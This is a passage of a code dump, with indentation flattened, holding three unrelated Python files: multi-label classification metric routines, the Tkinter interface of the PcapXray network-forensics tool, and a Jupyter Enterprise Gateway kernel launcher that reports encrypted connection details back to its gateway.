aupr_array.append(numpy.nan_to_num(auPR))
lock.release()
except Exception:
pass
t1 = Thread(target=compute_aupr_, args=(0,100,all_targets,all_predictions) )
t2 = Thread(target=compute_aupr_, args=(100,200,all_targets,all_predictions) )
t3 = Thread(target=compute_aupr_, args=(200,300,all_targets,all_predictions) )
t4 = Thread(target=compute_aupr_, args=(300,400,all_targets,all_predictions) )
t5 = Thread(target=compute_aupr_, args=(400,500,all_targets,all_predictions) )
t6 = Thread(target=compute_aupr_, args=(500,600,all_targets,all_predictions) )
t7 = Thread(target=compute_aupr_, args=(600,700,all_targets,all_predictions) )
t8 = Thread(target=compute_aupr_, args=(700,800,all_targets,all_predictions) )
t9 = Thread(target=compute_aupr_, args=(800,900,all_targets,all_predictions) )
t10 = Thread(target=compute_aupr_, args=(900,919,all_targets,all_predictions) )
t1.start();t2.start();t3.start();t4.start();t5.start();t6.start();t7.start();t8.start();t9.start();t10.start()
t1.join();t2.join();t3.join();t4.join();t5.join();t6.join();t7.join();t8.join();t9.join();t10.join()
aupr_array = numpy.array(aupr_array)
mean_aupr = numpy.mean(aupr_array)
median_aupr = numpy.median(aupr_array)
return mean_aupr,median_aupr,aupr_array
def compute_fdr(all_targets,all_predictions, fdr_cutoff=0.5):
fdr_array = []
for i in range(all_targets.shape[1]):
try:
precision, recall, thresholds = metrics.precision_recall_curve(all_targets[:,i], all_predictions[:,i],pos_label=1)
fdr = 1- precision
cutoff_index = next(i for i, x in enumerate(fdr) if x <= fdr_cutoff)
fdr_at_cutoff = recall[cutoff_index]
if not math.isnan(fdr_at_cutoff):
fdr_array.append(numpy.nan_to_num(fdr_at_cutoff))
except:
pass
fdr_array = numpy.array(fdr_array)
mean_fdr = numpy.mean(fdr_array)
median_fdr = numpy.median(fdr_array)
var_fdr = numpy.var(fdr_array)
return mean_fdr,median_fdr,var_fdr,fdr_array
def compute_aupr(all_targets,all_predictions):
aupr_array = []
for i in range(all_targets.shape[1]):
try:
precision, recall, thresholds = metrics.precision_recall_curve(all_targets[:,i], all_predictions[:,i], pos_label=1)
auPR = metrics.auc(recall,precision,reorder=True)
if not math.isnan(auPR):
aupr_array.append(numpy.nan_to_num(auPR))
except:
pass
aupr_array = numpy.array(aupr_array)
mean_aupr = numpy.mean(aupr_array)
median_aupr = numpy.median(aupr_array)
var_aupr = numpy.var(aupr_array)
return mean_aupr,median_aupr,var_aupr,aupr_array
def compute_auc_thread(all_targets,all_predictions):
auc_array = []
lock = Lock()
def compute_auc_(start,end,all_targets,all_predictions):
for i in range(start,end):
try:
auROC = metrics.roc_auc_score(all_targets[:,i], all_predictions[:,i])
lock.acquire()
if not math.isnan(auROC):
auc_array.append(auROC)
lock.release()
except ValueError:
pass
t1 = Thread(target=compute_auc_, args=(0,100,all_targets,all_predictions) )
t2 = Thread(target=compute_auc_, args=(100,200,all_targets,all_predictions) )
t3 = Thread(target=compute_auc_, args=(200,300,all_targets,all_predictions) )
t4 = Thread(target=compute_auc_, args=(300,400,all_targets,all_predictions) )
t5 = Thread(target=compute_auc_, args=(400,500,all_targets,all_predictions) )
t6 = Thread(target=compute_auc_, args=(500,600,all_targets,all_predictions) )
t7 = Thread(target=compute_auc_, args=(600,700,all_targets,all_predictions) )
t8 = Thread(target=compute_auc_, args=(700,800,all_targets,all_predictions) )
t9 = Thread(target=compute_auc_, args=(800,900,all_targets,all_predictions) )
t10 = Thread(target=compute_auc_, args=(900,919,all_targets,all_predictions) )
t1.start();t2.start();t3.start();t4.start();t5.start();t6.start();t7.start();t8.start();t9.start();t10.start()
t1.join();t2.join();t3.join();t4.join();t5.join();t6.join();t7.join();t8.join();t9.join();t10.join()
auc_array = numpy.array(auc_array)
mean_auc = numpy.mean(auc_array)
median_auc = numpy.median(auc_array)
return mean_auc,median_auc,auc_array
def compute_auc(all_targets,all_predictions):
auc_array = []
lock = Lock()
for i in range(all_targets.shape[1]):
try:
auROC = metrics.roc_auc_score(all_targets[:,i], all_predictions[:,i])
auc_array.append(auROC)
except ValueError:
pass
auc_array = numpy.array(auc_array)
mean_auc = numpy.mean(auc_array)
median_auc = numpy.median(auc_array)
var_auc = numpy.var(auc_array)
return mean_auc,median_auc,var_auc,auc_array
def Find_Optimal_Cutoff(all_targets, all_predictions):
thresh_array = []
for j in range(all_targets.shape[1]):
try:
fpr, tpr, threshold = roc_curve(all_targets[:,j], all_predictions[:,j], pos_label=1)
i = numpy.arange(len(tpr))
roc = pd.DataFrame({'tf' : pd.Series(tpr-(1-fpr), index=i), 'threshold' : pd.Series(threshold, index=i)})
roc_t = roc.ix[(roc.tf-0).abs().argsort()[:1]]
thresh_array.append(list(roc_t['threshold'])[0])
except:
pass
return thresh_array
def compute_metrics(all_predictions,all_targets,loss,args,elapsed,all_metrics=True,verbose=True):
all_targets = all_targets.numpy()
all_predictions = all_predictions.numpy()
if all_metrics:
meanAUC,medianAUC,varAUC,allAUC = compute_auc(all_targets,all_predictions)
meanAUPR,medianAUPR,varAUPR,allAUPR = compute_aupr(all_targets,all_predictions)
meanFDR,medianFDR,varFDR,allFDR = compute_fdr(all_targets,all_predictions)
else:
meanAUC,medianAUC,varAUC,allAUC = 0,0,0,0
meanAUPR,medianAUPR,varAUPR,allAUPR = 0,0,0,0
meanFDR,medianFDR,varFDR,allFDR = 0,0,0,0
optimal_threshold = args.br_threshold
# optimal_thresholds = Find_Optimal_Cutoff(all_targets,all_predictions)
# optimal_threshold = numpy.mean(numpy.array(optimal_thresholds))
if args.decoder in ['mlp','rnn_b','graph']:
all_predictions[all_predictions < optimal_threshold] = 0
all_predictions[all_predictions >= optimal_threshold] = 1
else:
all_predictions[all_predictions > 0.0] = 1
acc_ = list(subset_accuracy(all_targets, all_predictions, axis=1, per_sample=True))
hl_ = list(hamming_loss(all_targets, all_predictions, axis=1, per_sample=True))
exf1_ = list(example_f1_score(all_targets, all_predictions, axis=1, per_sample=True))
acc = numpy.mean(acc_)
hl = numpy.mean(hl_)
exf1 = numpy.mean(exf1_)
tp, fp, fn = compute_tp_fp_fn(all_targets, all_predictions, axis=0)
mif1 = f1_score_from_stats(tp, fp, fn, average='micro')
maf1 = f1_score_from_stats(tp, fp, fn, average='macro')
eval_ret = OrderedDict([('Subset accuracy', acc),
('Hamming accuracy', 1 - hl),
('Example-based F1', exf1),
('Label-based Micro F1', mif1),
('Label-based Macro F1', maf1)])
ACC = eval_ret['Subset accuracy']
HA = eval_ret['Hamming accuracy']
ebF1 = eval_ret['Example-based F1']
miF1 = eval_ret['Label-based Micro F1']
maF1 = eval_ret['Label-based Macro F1']
if verbose:
print('ACC: '+str(ACC))
print('HA: '+str(HA))
print('ebF1: '+str(ebF1))
print('miF1: '+str(miF1))
print('maF1: '+str(maF1))
if verbose:
print('uAUC: '+str(meanAUC))
# print('mAUC: '+str(medianAUC))
print('uAUPR: '+str(meanAUPR))
# print('mAUPR: '+str(medianAUPR))
print('uFDR: '+str(meanFDR))
# print('mFDR: '+str(medianFDR))
metrics_dict = {}
metrics_dict['ACC'] = ACC
metrics_dict['HA'] = HA
metrics_dict['ebF1'] = ebF1
metrics_dict['miF1'] = miF1
metrics_dict['maF1'] = maF1
metrics_dict['meanAUC'] = meanAUC
metrics_dict['medianAUC'] = medianAUC
metrics_dict['meanAUPR'] = meanAUPR
metrics_dict['allAUC'] = allAUC
metrics_dict['medianAUPR'] = medianAUPR
metrics_dict['allAUPR'] = allAUPR
metrics_dict['meanFDR'] = meanFDR
metrics_dict['medianFDR'] = medianFDR
metrics_dict['loss'] = loss
metrics_dict['time'] = elapsed
return metrics_dict
class Logger:
def __init__(self,args):
self.model_name = args.model_name
if args.model_name:
try:
os.makedirs(args.model_name)
except OSError as exc:
pass
try:
os.makedirs(args.model_name+'/epochs/')
except OSError as exc:
pass
self.file_names = {}
self.file_names['train'] = os.path.join(args.model_name,'train_results.csv')
self.file_names['valid'] = os.path.join(args.model_name,'valid_results.csv')
self.file_names['test'] = os.path.join(args.model_name,'test_results.csv')
self.file_names['valid_all_aupr'] = os.path.join(args.model_name,'valid_all_aupr.csv')
self.file_names['valid_all_auc'] = os.path.join(args.model_name,'valid_all_auc.csv')
self.file_names['test_all_aupr'] = os.path.join(args.model_name,'test_all_aupr.csv')
self.file_names['test_all_auc'] = os.path.join(args.model_name,'test_all_auc.csv')
f = open(self.file_names['train'],'w+'); f.close()
f = open(self.file_names['valid'],'w+'); f.close()
f = open(self.file_names['test'],'w+'); f.close()
f = open(self.file_names['valid_all_aupr'],'w+'); f.close()
f = open(self.file_names['valid_all_auc'],'w+'); f.close()
f = open(self.file_names['test_all_aupr'],'w+'); f.close()
f = open(self.file_names['test_all_auc'],'w+'); f.close()
os.utime(args.model_name,None)
self.best_valid = {'loss':1000000,'ACC':0,'HA':0,'ebF1':0,'miF1':0,'maF1':0,'meanAUC':0,'medianAUC':0,'meanAUPR':0,'medianAUPR':0,'meanFDR':0,'medianFDR':0,'allAUC':None,'allAUPR':None}
self.best_test = {'loss':1000000,'ACC':0,'HA':0,'ebF1':0,'miF1':0,'maF1':0,'meanAUC':0,'medianAUC':0,'meanAUPR':0,'medianAUPR':0,'meanFDR':0,'medianFDR':0,'allAUC':None,'allAUPR':None,'epoch':0}
def evaluate(self,train_metrics,valid_metrics,test_metrics,epoch,num_params):
if self.model_name:
# if train_metrics is not None:
# with open(self.file_names['train'],'a') as f:
# f.write(str(epoch)+','+str(train_metrics['loss'])
# +','+str(train_metrics['ACC'])
# +','+str(train_metrics['HA'])
# +','+str(train_metrics['ebF1'])
# +','+str(train_metrics['miF1'])
# +','+str(train_metrics['maF1'])
# +','+str(train_metrics['meanAUC'])
# +','+str(train_metrics['medianAUC'])
# +','+str(train_metrics['meanAUPR'])
# +','+str(train_metrics['medianAUPR'])
# +','+str(train_metrics['meanFDR'])
# +','+str(train_metrics['medianFDR'])
# +','+'{elapse:3.3f}'.format(elapse=train_metrics['time'])
# +','+str(num_params)
# +'\n')
# with open(self.file_names['valid'],'a') as f:
# f.write(str(epoch)+','+str(valid_metrics['loss'])
# +','+str(valid_metrics['ACC'])
# +','+str(valid_metrics['HA'])
# +','+str(valid_metrics['ebF1'])
# +','+str(valid_metrics['miF1'])
# +','+str(valid_metrics['maF1'])
# +','+str(valid_metrics['meanAUC'])
# +','+str(valid_metrics['medianAUC'])
# +','+str(valid_metrics['meanAUPR'])
# +','+str(valid_metrics['medianAUPR'])
# +','+str(valid_metrics['meanFDR'])
# +','+str(valid_metrics['medianFDR'])
# +','+'{elapse:3.3f}'.format(elapse=train_metrics['time'])
# +','+'{elapse:3.3f}'.format(elapse=valid_metrics['time'])
# +','+str(num_params)
# +'\n')
# with open(self.file_names['test'],'a') as f:
# f.write(str(epoch)+','+str(test_metrics['loss'])
# +','+str(test_metrics['ACC'])
# +','+str(test_metrics['HA'])
# +','+str(test_metrics['ebF1'])
# +','+str(test_metrics['miF1'])
# +','+str(test_metrics['maF1'])
# +','+str(test_metrics['meanAUC'])
# +','+str(test_metrics['medianAUC'])
# +','+str(test_metrics['meanAUPR'])
# +','+str(test_metrics['medianAUPR'])
# +','+str(test_metrics['meanFDR'])
# +','+str(test_metrics['medianFDR'])
# +','+'{elapse:3.3f}'.format(elapse=train_metrics['time'])
# +','+'{elapse:3.3f}'.format(elapse=test_metrics['time'])
# +','+str(num_params)
# +'\n')
with open(self.file_names['valid_all_auc'],'a') as f:
f.write(str(epoch))
for i,val in enumerate(valid_metrics['allAUC']):
f.write(','+str(val))
f.write('\n')
f.close()
with open(self.file_names['valid_all_aupr'],'a') as f:
f.write(str(epoch))
for i,val in enumerate(valid_metrics['allAUPR']):
f.write(','+str(val))
f.write('\n')
f.close()
with open(self.file_names['test_all_auc'],'a') as f:
f.write(str(epoch))
for i,val in enumerate(test_metrics['allAUC']):
f.write(','+str(val))
f.write('\n')
f.close()
with open(self.file_names['test_all_aupr'],'a') as f:
f.write(str(epoch))
for i,val in enumerate(test_metrics['allAUPR']):
f.write(','+str(val))
f.write('\n')
f.close()
for metric in valid_metrics.keys():
if not 'all' in metric and not 'time'in metric:
if valid_metrics[metric] >= self.best_valid[metric]:
self.best_valid[metric]= valid_metrics[metric]
self.best_test[metric]= test_metrics[metric]
if metric == 'ACC':
self.best_test['epoch'] = epoch
print('\n')
print('**********************************')
print('best ACC: '+str(self.best_test['ACC']))
print('best HA: '+str(self.best_test['HA']))
print('best ebF1: '+str(self.best_test['ebF1']))
print('best miF1: '+str(self.best_test['miF1']))
print('best maF1: '+str(self.best_test['maF1']))
print('best meanAUC: '+str(self.best_test['meanAUC']))
print('best meanAUPR: '+str(self.best_test['meanAUPR']))
print('best meanFDR: '+str(self.best_test['meanFDR']))
print('**********************************')
return self.best_valid,self.best_test
|
userInterface.py
|
from __future__ import print_function
from Tkinter import *
import Tkinter, Tkconstants, tkFileDialog
import ttk
import tkMessageBox
import pcapReader
import plotLanNetwork
import communicationDetailsFetch
import reportGen
import time
import threading
import Queue
from PIL import Image,ImageTk
import os, sys
class pcapXrayGui:
def __init__(self, base):
# Base Frame Configuration
self.base = base
base.title("PcapXray")
Label(base, text="PcapXray Tool - A LAN Network Analyzer")
# Style Configuration
style = ttk.Style()
style.configure("BW.TLabel", foreground="black")
style.configure("BW.TEntry", foreground="black")
# 1st Frame - Initial Frame
InitFrame = ttk.Frame(base, width=50, padding="10 10 10 10",relief= GROOVE)
InitFrame.grid(column=10, row=10, sticky=(N, W, E, S))
InitFrame.columnconfigure(10, weight=1)
InitFrame.rowconfigure(10, weight=1)
# Pcap File Entry
self.pcap_file = StringVar()
self.filename = ""
ttk.Label(InitFrame, text="Enter pcap file path: ",style="BW.TLabel").grid(column=0, row=0, sticky="W")
self.filename_field = ttk.Entry(InitFrame, width=30, textvariable=self.pcap_file, style="BW.TEntry").grid(column=1, row=0, sticky="W, E")
self.progressbar = ttk.Progressbar(InitFrame, orient="horizontal", length=200,value=0, maximum=200, mode="indeterminate")
# Browse button
#self.filename = StringVar()
ttk.Button(InitFrame, text="Browse", command=self.browse_directory).grid(column=2, row=0, padx=10, pady=10,sticky="E")
ttk.Button(InitFrame, text="Analyze!", command=self.pcap_analyse).grid(column=3, row=0, padx=10, pady=10,sticky="E")
self.progressbar.grid(column=4, row=0, padx=10, pady=10, sticky="E")
# Second Frame with Options
SecondFrame = ttk.Frame(base, width=50, padding="10 10 10 10",relief= GROOVE)
SecondFrame.grid(column=10, row=20, sticky=(N, W, E, S))
SecondFrame.columnconfigure(10, weight=1)
SecondFrame.rowconfigure(10, weight=1)
ttk.Label(SecondFrame, text="Options: ", style="BW.TLabel").grid(row=10,column=0,sticky="W")
self.option = StringVar()
self.options = {'All','HTTP','HTTPS','Tor','Malicious'}
#self.option.set('Tor')
ttk.OptionMenu(SecondFrame,self.option,"Select",*self.options).grid(row=10,column=1,sticky="W")
self.zoom = [900,900]
self.img = ""
ttk.Button(SecondFrame, text="zoomIn", command=self.zoom_in).grid(row=10,column=10,padx=5,sticky="E")
ttk.Button(SecondFrame, text="zoomOut", command=self.zoom_out).grid(row=10,column=11,sticky="E")
# Third Frame with Results and Descriptioms
self.ThirdFrame = ttk.Frame(base, width=100, height=100, padding="10 10 10 10",relief= GROOVE)
description = """It is a tool aimed to simplyfy the network analysis and speed the process of analysing the network traffic.\nThis prototype aims to accomplish 4 important modules,
\n 1. Web Traffic\n 2. Tor Traffic \n 3. Malicious Traffic \n 4. Device/Traffic Details\n\nPlease contact me @ [email protected] for any bugs or problems !
"""
self.label = ttk.Label(self.ThirdFrame, text="Description: \nPcapXray tools is an aid for Network Forensics or Any Network Analysis!\n"+description, style="BW.TLabel")
self.label.grid(column=10, row=10,sticky="W")
self.xscrollbar = Scrollbar(self.ThirdFrame, orient=HORIZONTAL)
self.xscrollbar.grid(row=100, column=0, sticky=E + W)
self.yscrollbar = Scrollbar(self.ThirdFrame, orient=VERTICAL)
self.yscrollbar.grid(row=0, column=100, sticky=N + S)
self.ThirdFrame.grid(column=10, row=30, sticky=(N, W, E, S))
self.ThirdFrame.columnconfigure(0, weight=1)
self.ThirdFrame.rowconfigure(0, weight=1)
self.name_servers = ""
def browse_directory(self):
# Reference: http://effbot.org/tkinterbook/tkinter-dialog-windows.htm
self.pcap_file.set(tkFileDialog.askopenfilename(initialdir = sys.path[0],title = "Select Packet Capture File!",filetypes = (("pcap files","*.pcap"),("pcapng files","*.pcapng"))))
self.filename = self.pcap_file.get().replace(".pcap","")
if "/" in self.filename:
self.filename = self.filename.split("/")[-1]
#,("all files","*.*")
#self.filename_field.delete(0, END)
#self.filename_field.insert(0, self.pcap_file)
print(self.filename)
print(self.pcap_file)
def pcap_analyse(self):
if os.path.exists(self.pcap_file.get()):
self.progressbar.start()
result = Queue.Queue()
packet_read = threading.Thread(target=pcapReader.pcapReader,args=(self.pcap_file.get(),result))
packet_read.start()
while packet_read.is_alive():
self.progressbar.update()
packet_read.join()
self.progressbar.stop()
#packet_read.join()
self.capture_read = result.get()
reportThreadpcap = threading.Thread(target=reportGen.reportGen().packetDetails,args=(self.capture_read,))
reportThreadpcap.start()
#self.option.set("Tor")
self.option.trace("w",self.map_select)
#self.option.set("Tor")
self.name_servers = ""
else:
tkMessageBox.showerror("Error","File Not Found !")
def generate_graph(self):
if self.name_servers == "":
result = Queue.Queue()
t = threading.Thread(target=communicationDetailsFetch.trafficDetailsFetch,args=(self.capture_read,result))
t.start()
self.progressbar.start()
while t.is_alive():
self.progressbar.update()
t.join()
self.progressbar.stop()
self.name_servers = result.get()
reportThread = threading.Thread(target=reportGen.reportGen().communicationDetailsReport,args=(self.name_servers,))
reportThread.start()
if not os.path.exists("Report/"+self.filename+self.option.get()+".png"):
t1 = threading.Thread(target=plotLanNetwork.plotLan, args=(self.capture_read, self.filename, self.name_servers, self.option.get(),))
t1.start()
self.progressbar.start()
while t1.is_alive():
self.progressbar.update()
t1.join()
self.progressbar.stop()
self.label.grid_forget()
self.load_image()
else:
self.label.grid_forget()
self.load_image()
def load_image(self):
self.canvas = Canvas(self.ThirdFrame, width=700,height=600, bd=0, bg="navy", xscrollcommand=self.xscrollbar.set, yscrollcommand=self.yscrollbar.set)
self.canvas.grid(row=0, column=0, sticky=N + S + E + W)
self.img = ImageTk.PhotoImage(Image.open("Report/"+self.filename+self.option.get()+".png").resize(tuple(self.zoom),Image.ANTIALIAS).convert('RGB'))
self.canvas.create_image(0,0, image=self.img)
self.canvas.config(scrollregion=self.canvas.bbox(ALL))
self.xscrollbar.config(command=self.canvas.xview)
self.yscrollbar.config(command=self.canvas.yview)
def map_select(self, *args):
print(self.option.get())
self.generate_graph()
def zoom_in(self):
print("zoomin")
self.zoom[0] += 100
self.zoom[1] += 100
if self.img:
self.load_image()
def zoom_out(self):
print("zoomout")
if self.zoom[0] > 700 and self.zoom[1] > 700:
self.zoom[0] -= 100
self.zoom[1] -= 100
else:
print("zoomout --> maximum")
if self.img:
self.load_image()
def main():
base = Tk()
pcapXrayGui(base)
base.mainloop()
#main()
|
launch_ipykernel.py
|
import argparse
import base64
import json
import logging
import os
import socket
import tempfile
import uuid
from future.utils import raise_from
from multiprocessing import Process
from random import random
from threading import Thread
from Cryptodome.Cipher import AES
from ipython_genutils.py3compat import str_to_bytes
from jupyter_client.connect import write_connection_file
# Minimum port range size and max retries
min_port_range_size = int(os.getenv('EG_MIN_PORT_RANGE_SIZE', '1000'))
max_port_range_retries = int(os.getenv('EG_MAX_PORT_RANGE_RETRIES', '5'))
log_level = int(os.getenv('EG_LOG_LEVEL', '10'))
logging.basicConfig(format='[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s] %(message)s')
logger = logging.getLogger('launch_ipykernel')
logger.setLevel(log_level)
class ExceptionThread(Thread):
# Wrap thread to handle the exception
def __init__(self, target):
self.target = target
self.exc = None
Thread.__init__(self)
def run(self):
try:
self.target()
except Exception as exc:
self.exc = exc
def initialize_namespace(namespace, cluster_type='spark'):
"""Initialize the kernel namespace.
Parameters
----------
cluster_type : {'spark', 'dask', 'none'}
The cluster type to initialize. ``'none'`` results in no variables in
the initial namespace.
"""
if cluster_type == 'spark':
try:
from pyspark.sql import SparkSession
except ImportError:
logger.info("A spark context was desired but the pyspark distribution is not present. "
"Spark context creation will not occur.")
return {}
def initialize_spark_session():
import atexit
"""Initialize Spark session and replace global variable
placeholders with real Spark session object references."""
spark = SparkSession.builder.getOrCreate()
sc = spark.sparkContext
sql = spark.sql
sqlContext = spark._wrapped
sqlCtx = sqlContext
# Stop the spark session on exit
atexit.register(lambda: spark.stop())
namespace.update({'spark': spark,
'sc': spark.sparkContext,
'sql': spark.sql,
'sqlContext': spark._wrapped,
'sqlCtx': spark._wrapped})
init_thread = ExceptionThread(target=initialize_spark_session)
spark = WaitingForSparkSessionToBeInitialized('spark', init_thread, namespace)
sc = WaitingForSparkSessionToBeInitialized('sc', init_thread, namespace)
sqlContext = WaitingForSparkSessionToBeInitialized('sqlContext', init_thread, namespace)
def sql(query):
"""Placeholder function. When called will wait for Spark session to be
initialized and call ``spark.sql(query)``"""
return spark.sql(query)
namespace.update({'spark': spark,
'sc': sc,
'sql': sql,
'sqlContext': sqlContext,
'sqlCtx': sqlContext})
init_thread.start()
elif cluster_type == 'dask':
import dask_yarn
cluster = dask_yarn.YarnCluster.from_current()
namespace.update({'cluster': cluster})
elif cluster_type != 'none':
raise RuntimeError("Unknown cluster_type: %r" % cluster_type)
class WaitingForSparkSessionToBeInitialized(object):
"""Wrapper object for SparkContext and other Spark session variables while the real Spark session is being
initialized in a background thread. The class name is intentionally worded verbosely explicit as it will show up
when executing a cell that contains only a Spark session variable like ``sc`` or ``sqlContext``.
"""
# private and public attributes that show up for tab completion,
# to indicate pending initialization of Spark session
_WAITING_FOR_SPARK_SESSION_TO_BE_INITIALIZED = 'Spark Session not yet initialized ...'
WAITING_FOR_SPARK_SESSION_TO_BE_INITIALIZED = 'Spark Session not yet initialized ...'
# the same wrapper class is used for all Spark session variables, so we need to record the name of the variable
def __init__(self, global_variable_name, init_thread, namespace):
self._spark_session_variable = global_variable_name
self._init_thread = init_thread
self._namespace = namespace
# we intercept all method and attribute references on our temporary Spark session variable,
# wait for the thread to complete initializing the Spark sessions and then we forward the
# call to the real Spark objects
def __getattr__(self, name):
# ignore tab-completion request for __members__ or __methods__ and ignore meta property requests
if name.startswith("__"):
pass
elif name.startswith("_ipython_"):
pass
elif name.startswith("_repr_"):
pass
else:
# wait on thread to initialize the Spark session variables in global variable scope
self._init_thread.join(timeout=None)
exc = self._init_thread.exc
if exc:
raise_from(RuntimeError("Variable: {} was not initialized properly.".format(self._spark_session_variable)), exc)
# now return attribute/function reference from actual Spark object
return getattr(self._namespace[self._spark_session_variable], name)
def prepare_gateway_socket(lower_port, upper_port):
sock = _select_socket(lower_port, upper_port)
logger.info("Signal socket bound to host: {}, port: {}".format(sock.getsockname()[0], sock.getsockname()[1]))
sock.listen(1)
sock.settimeout(5)
return sock
def _encrypt(connection_info, conn_file):
# Block size for cipher obj can be 16, 24, or 32. 16 matches 128 bit.
BLOCK_SIZE = 16
# Ensure that the length of the data that will be encrypted is a
# multiple of BLOCK_SIZE by padding with '%' on the right.
PADDING = '%'
pad = lambda s: s.decode("utf-8") + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# Encrypt connection_info whose length is a multiple of BLOCK_SIZE using
# AES cipher and then encode the resulting byte array using Base64.
encryptAES = lambda c, s: base64.b64encode(c.encrypt(pad(s).encode('utf-8')))
# Create a key using first 16 chars of the kernel-id that is burnt in
# the name of the connection file.
bn = os.path.basename(conn_file)
if (bn.find("kernel-") == -1):
logger.error("Invalid connection file name '{}'".format(conn_file))
raise RuntimeError("Invalid connection file name '{}'".format(conn_file))
tokens = bn.split("kernel-")
kernel_id = tokens[1]
key = kernel_id[0:16]
# print("AES Encryption Key '{}'".format(key))
# Creates the cipher obj using the key.
cipher = AES.new(key.encode('utf-8'), AES.MODE_ECB)
payload = encryptAES(cipher, connection_info)
return payload
def return_connection_info(connection_file, response_addr, lower_port, upper_port):
response_parts = response_addr.split(":")
if len(response_parts) != 2:
logger.error("Invalid format for response address '{}'. "
"Assuming 'pull' mode...".format(response_addr))
return
response_ip = response_parts[0]
try:
response_port = int(response_parts[1])
except ValueError:
logger.error("Invalid port component found in response address '{}'. "
"Assuming 'pull' mode...".format(response_addr))
return
with open(connection_file) as fp:
cf_json = json.load(fp)
fp.close()
# add process and process group ids into connection info
pid = os.getpid()
cf_json['pid'] = str(pid)
cf_json['pgid'] = str(os.getpgid(pid))
# prepare socket address for handling signals
gateway_sock = prepare_gateway_socket(lower_port, upper_port)
cf_json['comm_port'] = gateway_sock.getsockname()[1]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((response_ip, response_port))
json_content = json.dumps(cf_json).encode(encoding='utf-8')
logger.debug("JSON Payload '{}".format(json_content))
payload = _encrypt(json_content, connection_file)
logger.debug("Encrypted Payload '{}".format(payload))
s.send(payload)
finally:
s.close()
return gateway_sock
def determine_connection_file(conn_file, kid):
# If the directory exists, use the original file, else create a temporary file.
if conn_file is None or not os.path.exists(os.path.dirname(conn_file)):
if kid is not None:
basename = 'kernel-' + kid
else:
basename = os.path.splitext(os.path.basename(conn_file))[0]
fd, conn_file = tempfile.mkstemp(suffix=".json", prefix=basename + "_")
os.close(fd)
logger.debug("Using connection file '{}'.".format(conn_file))
return conn_file
def _select_ports(count, lower_port, upper_port):
"""Select and return n random ports that are available and adhere to the given port range, if applicable."""
ports = []
sockets = []
for i in range(count):
sock = _select_socket(lower_port, upper_port)
ports.append(sock.getsockname()[1])
sockets.append(sock)
for sock in sockets:
sock.close()
return ports
def _select_socket(lower_port, upper_port):
"""Create and return a socket whose port is available and adheres to the given port range, if applicable."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
found_port = False
retries = 0
while not found_port:
try:
sock.bind(('0.0.0.0', _get_candidate_port(lower_port, upper_port)))
found_port = True
except Exception:
retries = retries + 1
if retries > max_port_range_retries:
raise RuntimeError(
"Failed to locate port within range {}..{} after {} retries!".
format(lower_port, upper_port, max_port_range_retries))
return sock
def _get_candidate_port(lower_port, upper_port):
range_size = upper_port - lower_port
if range_size == 0:
return 0
return random.randint(lower_port, upper_port)
def _validate_port_range(port_range):
# if no argument was provided, return a range of 0
if not port_range:
return 0, 0
try:
port_ranges = port_range.split("..")
lower_port = int(port_ranges[0])
upper_port = int(port_ranges[1])
port_range_size = upper_port - lower_port
if port_range_size != 0:
if port_range_size < min_port_range_size:
raise RuntimeError(
"Port range validation failed for range: '{}'. Range size must be at least {} as specified by"
" env EG_MIN_PORT_RANGE_SIZE".format(port_range, min_port_range_size))
except ValueError as ve:
raise RuntimeError("Port range validation failed for range: '{}'. Error was: {}".format(port_range, ve))
except IndexError as ie:
raise RuntimeError("Port range validation failed for range: '{}'. Error was: {}".format(port_range, ie))
return lower_port, upper_port
def get_gateway_request(sock):
conn = None
data = ''
request_info = None
try:
conn, addr = sock.accept()
while True:
buffer = conn.recv(1024).decode('utf-8')
if not buffer: # send is complete
request_info = json.loads(data)
break
data = data + buffer # append what we received until we get no more...
except Exception as e:
if type(e) is not socket.timeout:
raise e
finally:
if conn:
conn.close()
return request_info
def gateway_listener(sock, parent_pid):
shutdown = False
while not shutdown:
request = get_gateway_request(sock)
if request:
signum = -1 # prevent logging poll requests since that occurs every 3 seconds
if request.get('signum') is not None:
signum = int(request.get('signum'))
os.kill(parent_pid, signum)
if request.get('shutdown') is not None:
shutdown = bool(request.get('shutdown'))
if signum != 0:
logger.info("gateway_listener got request: {}".format(request))
def start_ipython(namespace, cluster_type="spark", **kwargs):
from IPython import embed_kernel
# create an initial list of variables to clear
# we do this without deleting to preserve the locals so that
# initialize_namespace isn't affected by this mutation
to_delete = [k for k in namespace if not k.startswith('__')]
# initialize the namespace with the proper variables
initialize_namespace(namespace, cluster_type=cluster_type)
# delete the extraneous variables
for k in to_delete:
del namespace[k]
# Start the kernel
embed_kernel(local_ns=namespace, **kwargs)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('connection_file', nargs='?', help='Connection file to write connection info')
parser.add_argument('--RemoteProcessProxy.response-address', dest='response_address', nargs='?',
metavar='<ip>:<port>', help='Connection address (<ip>:<port>) for returning connection file')
parser.add_argument('--RemoteProcessProxy.kernel-id', dest='kernel_id', nargs='?',
help='Indicates the id associated with the launched kernel.')
parser.add_argument('--RemoteProcessProxy.port-range', dest='port_range', nargs='?',
metavar='<lowerPort>..<upperPort>', help='Port range to impose for kernel ports')
parser.add_argument('--RemoteProcessProxy.spark-context-initialization-mode', dest='init_mode', nargs='?',
default='none', help='the initialization mode of the spark context: lazy, eager or none')
parser.add_argument('--RemoteProcessProxy.cluster-type', dest='cluster_type', nargs='?',
default='spark', help='the kind of cluster to initialize: spark, dask, or none')
arguments = vars(parser.parse_args())
connection_file = arguments['connection_file']
response_addr = arguments['response_address']
kernel_id = arguments['kernel_id']
lower_port, upper_port = _validate_port_range(arguments['port_range'])
spark_init_mode = arguments['init_mode']
cluster_type = arguments['cluster_type']
ip = "0.0.0.0"
if connection_file is None and kernel_id is None:
raise RuntimeError("At least one of the parameters: 'connection_file' or "
"'--RemoteProcessProxy.kernel-id' must be provided!")
# If the connection file doesn't exist, then create it.
if (connection_file and not os.path.isfile(connection_file)) or kernel_id is not None:
key = str_to_bytes(str(uuid.uuid4()))
connection_file = determine_connection_file(connection_file, kernel_id)
ports = _select_ports(5, lower_port, upper_port)
write_connection_file(fname=connection_file, ip=ip, key=key, shell_port=ports[0], iopub_port=ports[1],
stdin_port=ports[2], hb_port=ports[3], control_port=ports[4])
if response_addr:
gateway_socket = return_connection_info(connection_file, response_addr, lower_port, upper_port)
